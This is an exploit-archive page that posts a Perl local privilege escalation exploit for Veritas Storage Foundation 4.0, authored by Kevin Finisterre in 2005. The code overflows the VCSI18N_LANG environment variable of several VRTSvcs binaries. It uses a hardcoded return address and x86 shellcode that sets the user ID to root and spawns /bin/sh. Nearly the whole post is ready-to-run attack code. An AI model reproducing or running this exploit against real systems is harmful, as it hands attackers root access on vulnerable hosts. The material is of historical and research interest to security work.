exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SF_multi.pl.txt

SF_multi.pl.txt
Posted Nov 13, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

Veritas Storage Foundation 4.0 local root exploit that takes advantage of a buffer overflow in the VCSI18N_LANG environment variable.

tags | exploit, overflow, local, root
SHA-256 | 587a778f72ac01b11f2daf11d28d6e33a3c6d445c52a6d3b53972ceb9b9746b2

SF_multi.pl.txt

Change Mirror Download
#!/usr/bin/perl -w
#
# Veritas Storage Foundation 4.0
#
# http://www.digitalmunition.com
# kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005
#
# This bug has not been patched as of:
# Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz
#
# Make sure you don't get your sploits from some
# Frenchie at FR-SIRT go to milw0rm instead.
#
$retval = 0xbffffc17;

$tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72";
$tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72";
$tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72";
$tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72";
$tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72";
$tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72";
$tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72";
$tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72";
$tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72";
$tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72";
$tgts{"10"} = "/opt/VRTSvcs/bin/halog:72";
$tgts{"11"} = "/opt/VRTSvcs/bin/hares:72";
$tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72";
$tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72";
$tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72";
$tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72";
$tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72";

unless (($target) = @ARGV) {

print "\n Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n";
print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a\n";
}

print "\n";
exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n\n";

$sc = "\x90"x1024;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$buf = "A" x $b;
$buf .= "$ret" x 2;

$ENV{"VCSI18N_LANG"} = $buf;
$ENV{"DMR0x"} = $sc;

exec("$a DMR0x");
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close